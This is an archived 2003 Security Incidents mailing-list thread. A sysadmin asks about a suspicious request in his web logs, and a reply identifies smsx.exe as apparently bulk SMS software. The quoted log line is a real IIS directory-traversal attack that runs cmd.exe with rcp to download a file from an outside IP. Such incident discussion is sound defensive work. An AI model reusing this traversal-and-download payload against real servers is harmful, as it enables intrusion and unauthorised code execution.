Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: smsx.exe?

From: Michael J McCafferty <mike () m5computersecurity com>
Date: Mon, 05 May 2003 17:57:58 -0700

smsx.exe is not the Microsoft SMS product, it is probably this:
http://www.superbank.ru/sms/
If you look at the bottom of the features page of this product, it is designed to send lots of SMS messages to hand help devices. 
http://www.superbank.ru/sms/SMSexpress.htm
Your would be attacker is trying to get your machine to download software to send short messages to hand held devices. I have received a couple pieces of spam on my cell phone lately, so I am sensitive to this. Your would-be attacker's motives may be different. 


At 02:29 PM 5/5/2003 -0300, Steve Bromwich wrote:

Hi,

Has anyone seen a request like this in their logs?

205.247.193.56 - - [05/May/2003:11:59:52 -0300]
"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rcp+-b+195.92.252.138.adm:smsx.exe+."

I tried rcping smsx.exe off the remote site but no joy; is the .adm an
obscure windows-specific port address or something? One of our windows
guys said the smsx was "remote management software", but had no idea about
the .adm...

On a side note, the response I got from energis (the 195.92.252.138 owner)
had the following at the start:

PLEASE NOTE WE ARE CURRENTLY DEALING WITH A 2 WEEK BACKLOG

Further down:

Please note that if one of our IP addresses looks up to a 'webcache' (as
opposed to a modem) we have a *maximum* of 30 hours to trace the user
responsible for the abuse.

So I guess this means that Energis users have a pretty good chance of
abusing remote servers through Energis' web cache and getting away with it
:-/

Cheers, Steve

----------------------------------------------------------------------------
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the
world's premier event for IT and network security experts.  The two-day
Training features 6 hand-on courses on May 12-13 taught by professionals.
The two-day Briefings on May 14-15 features 24 top speakers with no vendor
sales pitches.  Deadline for the best rates is April 25.  Register today to
ensure your place. http://www.securityfocus.com/BlackHat-incidents
----------------------------------------------------------------------------


**************************************************
Michael J. McCafferty
Principal, Security Engineer
M5 Computer Security
858-576-7325 Voice
http://www.m5computersecurity.com
**************************************************
--- "If you build it, they will hack !" --- 

----------------------------------------------------------------------------
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by professionals. The two-day Briefings on May 14-15 features 24 top speakers with no vendor sales pitches. Deadline for the best rates is April 25. Register today to ensure your place. http://www.securityfocus.com/BlackHat-incidents ----------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: